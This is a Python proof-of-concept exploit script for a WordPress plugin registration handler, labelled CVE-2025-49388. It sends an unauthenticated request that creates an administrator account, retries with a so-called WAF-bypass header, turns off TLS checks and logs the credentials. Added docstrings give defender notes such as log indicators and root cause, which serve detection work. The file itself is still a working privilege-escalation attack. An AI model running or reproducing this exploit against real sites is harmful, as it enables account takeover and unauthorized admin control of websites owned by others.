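#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# By Khaled ALenazi ( Nxploited )
# Requires: requests, colorama
# Install: pip install requests colorama
"""Proof-of-concept client labelled CVE-2025-49388 in its own CLI description.

What this file does, as written:

* Sends one POST to ``<site>/wp-admin/admin-ajax.php`` whose body carries
  ``action=miraculous_user_register_form`` together with
  ``roleusers=administrator``.  The request carries no WordPress session
  cookie or nonce.
* Treats the text ``You are successfully registered`` in the response as
  proof that the account was created with the requested role.

Defender notes (derived from the request built below):

* Root cause implied by the payload: a registration handler that takes the
  new account's role from a request field.  A handler should assign the
  role server-side (for example the site's configured default role) or
  check the requested value against an allowlist that excludes privileged
  roles.
* Log indicators from unmodified copies of this script: POSTs to
  ``admin-ajax.php`` with the action and ``roleusers`` values above; the
  headers ``Nxploited-By``, ``Origin: Nxploited``,
  ``Referer: https://google.com/Nxploited`` and, on retries,
  ``Nxploited-Bypass``; a ``NxploitedID=`` cookie; a User-Agent ending in
  ``Nxploited``.
* Account indicators: the default username ``Nxploited_admin`` and e-mail
  ``Nxploited@gmail.com``.  Any administrator account created close in time
  to such a POST deserves review regardless of its name.
"""

import sys

# NOTE(review): the f-strings further down are a syntax error on Python 2, so
# this check can only ever run on Python 3; it is kept for parity with the
# original file.
if sys.version_info[0] < 3:
    print("This script requires Python 3.x!")
    sys.exit(1)

try:
    from colorama import Fore, Style, init
    init(autoreset=True)
except ImportError:
    class Dummy:
        """No-colour stand-in used when colorama is not installed.

        Every attribute read from ``Fore`` / ``Style`` in this file must
        exist here.  The original fallback lacked ``WHITE`` and
        ``RESET_ALL``, so the first status line raised AttributeError.
        """
        RESET = RESET_ALL = ''
        RED = GREEN = YELLOW = CYAN = WHITE = ''

    Fore = Style = Dummy()

import argparse
import random
import re
import socket
import string
import time

try:
    import requests
    import urllib3
except ImportError:
    # Reported with the install hint in Nxploited_main() instead of a
    # traceback at import time.
    requests = None
    urllib3 = None

if urllib3 is not None:
    # Certificate verification is switched off in Nxploited_safe_request();
    # this only silences the warning urllib3 would print for it.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def Nxploited_generate_headers():
    """Build the HTTP headers sent with the registration request.

    Returns:
        dict: header name -> value.  The User-Agent is picked at random from
        five fixed strings and the cookie value is random; everything else
        is constant.

    Several values are unusual for browser traffic (``Origin: Nxploited``,
    the custom ``Nxploited-By`` header, the ``/Nxploited`` referer path) and
    work as request fingerprints in web-server or WAF logs.
    """
    agents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited",
        "Mozilla/5.0 (X11; Linux x86_64) Nxploited",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited",
        "Nxploited/1.0 (compatible;)",
        # Claims to be Googlebot; the trailing token still gives it away.
        "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Nxploited",
    ]
    cookies = f"NxploitedID={Nxploited_random_string(16)}"
    return {
        "User-Agent": random.choice(agents),
        "Accept": "*/*",
        "Connection": "close",
        "Referer": "https://google.com/Nxploited",
        "X-Requested-With": "XMLHttpRequest",
        "Nxploited-By": "Nxploited",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": cookies,
        "Cache-Control": "no-cache",
        "Pragma": "no-cache",
        "Upgrade-Insecure-Requests": "1",
        "Origin": "Nxploited",
    }


def Nxploited_random_string(length=8):
    """Return ``length`` random ASCII letters and digits.

    Uses the non-cryptographic ``random`` module; in this file the result
    only fills a cookie value and a header value.
    """
    chars = string.ascii_letters + string.digits
    return ''.join(random.choice(chars) for _ in range(length))


def Nxploited_build_payload(username, full_name, useremail, password):
    """Return the form fields posted to admin-ajax.php.

    ``roleusers`` is the field a defender cares about: the requested role
    travels in the request body.  A server that honours it lets the caller
    pick the role of the account being registered.
    """
    return {
        "action": "miraculous_user_register_form",
        "username": username,
        "full_name": full_name,
        "useremail": useremail,
        "password": password,
        "confirmpass": password,
        "roleusers": "administrator",
    }


def Nxploited_extract_host_port(url):
    """Split the authority part of ``url`` into ``(host, port)``.

    Args:
        url: absolute URL that includes its scheme.  The authority is taken
            as the third ``/``-separated field, so a URL without ``//``
            raises IndexError.

    Returns:
        tuple: host string (IPv6 brackets removed) and integer port.  A
        missing or non-numeric port falls back to 443 when the URL starts
        with ``https`` and to 80 otherwise.
    """
    default_port = 443 if url.startswith("https") else 80
    host_port = url.split("/")[2]

    if host_port.startswith("["):
        # Bracketed IPv6 literal, optionally followed by :port.
        match = re.match(r"^\[([^\]]+)\](?::(\d+))?$", host_port)
        if not match:
            return host_port, default_port
        port = int(match.group(2)) if match.group(2) else default_port
        return match.group(1), port

    if ":" in host_port:
        host, port_text = host_port.rsplit(":", 1)
        try:
            return host, int(port_text)
        except ValueError:
            return host, default_port

    return host_port, default_port


def Nxploited_check_network(host, port=80, timeout=5):
    """Return True if a TCP connection to ``host:port`` can be opened.

    The timeout is set on this socket only.  The original called
    ``socket.setdefaulttimeout``, which changed the default for every socket
    in the process, and it leaked the socket when ``connect`` failed.
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((host, port))
        return True
    except (OSError, OverflowError, ValueError):
        # Refused, timed out, unresolvable name, or out-of-range port.
        return False


def Nxploited_safe_request(url, data, headers, retries=5, timeout=12):
    """POST ``data`` to ``url``, retrying on errors and on 403/406/429.

    Args:
        url: full endpoint URL.
        data: form fields for the request body.
        headers: request headers; copied, so the caller's dict is not
            modified (the original wrote the retry header into it).
        retries: maximum number of attempts.
        timeout: per-request timeout in seconds.

    Returns:
        requests.Response: the first response whose status is not 403, 406
        or 429.

    Exits the process with status 1 when every attempt fails.
    """
    request_headers = dict(headers)
    for attempt in range(retries):
        try:
            # One session per attempt, closed on exit from the block; the
            # body has already been read because streaming is not enabled.
            with requests.Session() as session:
                session.max_redirects = 10
                resp = session.post(
                    url,
                    data=data,
                    headers=request_headers,
                    timeout=timeout,
                    # TLS verification is off, so the peer is not
                    # authenticated and the response text used to judge
                    # success could come from an intermediary.
                    verify=False,
                    allow_redirects=True,
                )
        except requests.exceptions.TooManyRedirects:
            Nxploited_print_status("Too many redirects, retrying with new session.", warn=True)
            continue
        except requests.exceptions.Timeout:
            Nxploited_print_status("Timeout, increasing wait and retrying.", warn=True)
            time.sleep(3 + attempt)
            continue
        except requests.exceptions.RequestException as e:
            Nxploited_print_status(f"Attempt {attempt+1}: {str(e)}", warn=True)
            time.sleep(2 + attempt)
            continue

        if resp.status_code in (403, 406, 429):
            Nxploited_print_status(f"Possible WAF detected (HTTP {resp.status_code}), attempt bypass...", warn=True)
            # Nothing in this file shows the extra header changing how a
            # filter responds; for a defender it is one more request marker.
            request_headers["Nxploited-Bypass"] = Nxploited_random_string(12)
            time.sleep(1)
            continue
        return resp

    Nxploited_print_status("All connection attempts failed.", error=True)
    sys.exit(1)


def Nxploited_print_status(msg, success=False, warn=False, error=False):
    """Print ``msg`` with a severity prefix and matching colour.

    Precedence when several flags are set: success, then warn, then error.
    With none set the line is printed as INFO.
    """
    prefix = "[Nxploited INFO]"
    color = Fore.WHITE
    if success:
        prefix = "[Nxploited SUCCESS]"
        color = Fore.GREEN
    elif warn:
        prefix = "[Nxploited WARNING]"
        color = Fore.YELLOW
    elif error:
        prefix = "[Nxploited ERROR]"
        color = Fore.RED
    print(f"{color}{prefix} {msg}{Style.RESET_ALL}")


def Nxploited_check_success(response_text):
    """Return True when the response contains the registration success text.

    The check is a substring match on the response body only; it does not
    confirm which role the new account actually received.  On failure the
    whole body is printed for inspection.
    """
    if 'You are successfully registered' in response_text:
        Nxploited_print_status("Exploitation succeeded! Nxploited By Nxploited", success=True)
        return True
    Nxploited_print_status("Exploit attempt failed or protection in place.", error=True)
    print(Fore.YELLOW + "[Nxploited DEBUG] Response Body:\n" + response_text + Style.RESET_ALL)
    return False


def Nxploited_show_credentials(username, password, useremail):
    """Print the submitted username, password and e-mail to stdout."""
    print(Fore.CYAN + "\n[Nxploited CREDENTIALS]" + Style.RESET_ALL)
    print(Fore.CYAN + f"Username : {username}")
    print(Fore.CYAN + f"Password : {password}")
    print(Fore.CYAN + f"Email    : {useremail}" + Style.RESET_ALL)


def Nxploited_log_to_file(filename, msg):
    """Append ``msg`` plus a newline to ``filename`` (UTF-8).

    Logging stays best-effort, but a write failure is now reported instead
    of being swallowed.  The caller writes credentials through this
    function, so the file holds them in clear text.
    """
    try:
        with open(filename, "a", encoding="utf-8") as logf:
            logf.write(msg + "\n")
    except OSError as err:
        Nxploited_print_status(f"Could not write to {filename}: {err}", warn=True)


def Nxploited_main():
    """Parse the command line, send the request and report the outcome."""
    parser = argparse.ArgumentParser(description="CVE-2025-49388 (Nxploited Edition)")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
    parser.add_argument("-un", "--username", default="Nxploited_admin", help="Username to register (default: Nxploited_admin)")
    parser.add_argument("-fn", "--full_name", default="Nxploited", help="Full name (default: Nxploited)")
    parser.add_argument("-em", "--useremail", default="Nxploited@gmail.com", help="Email (default: Nxploited@gmail.com)")
    parser.add_argument("-pw", "--password", default="Str0ng!Pass123", help="Password (default: Str0ng!Pass123)")
    parser.add_argument("-o", "--output", default=None, help="Write results and log to this file")
    args = parser.parse_args()

    if requests is None:
        Nxploited_print_status("The 'requests' package is required: pip install requests", error=True)
        sys.exit(1)

    # A bare host name is assumed to be plain HTTP.  The original followed
    # this with a second startswith('http') test that could never fail.
    if not args.url.startswith(("http://", "https://")):
        args.url = "http://" + args.url

    target = args.url.rstrip("/") + "/wp-admin/admin-ajax.php"
    host, port = Nxploited_extract_host_port(args.url)
    if not Nxploited_check_network(host, port):
        Nxploited_print_status(f"Host not reachable ({host}:{port}). Check your network or target address.", error=True)
        sys.exit(1)

    headers = Nxploited_generate_headers()
    data = Nxploited_build_payload(args.username, args.full_name, args.useremail, args.password)
    Nxploited_print_status(f"Target: {target}")
    Nxploited_print_status("Starting exploitation attempt...")
    response = Nxploited_safe_request(target, data, headers)

    if Nxploited_check_success(response.text):
        Nxploited_show_credentials(args.username, args.password, args.useremail)
        if args.output:
            Nxploited_log_to_file(args.output, f"[SUCCESS]\nUsername: {args.username}\nPassword: {args.password}\nEmail: {args.useremail}\n")
    else:
        Nxploited_print_status("Target might be patched, protected, or blocking requests.", warn=True)
        if args.output:
            Nxploited_log_to_file(args.output, "[FAILED] Target might be patched/protected.\n")


if __name__ == "__main__":
    try:
        Nxploited_main()
    except Exception as ex:
        Nxploited_print_status(f"Unexpected error: {ex}", error=True)
        sys.exit(1)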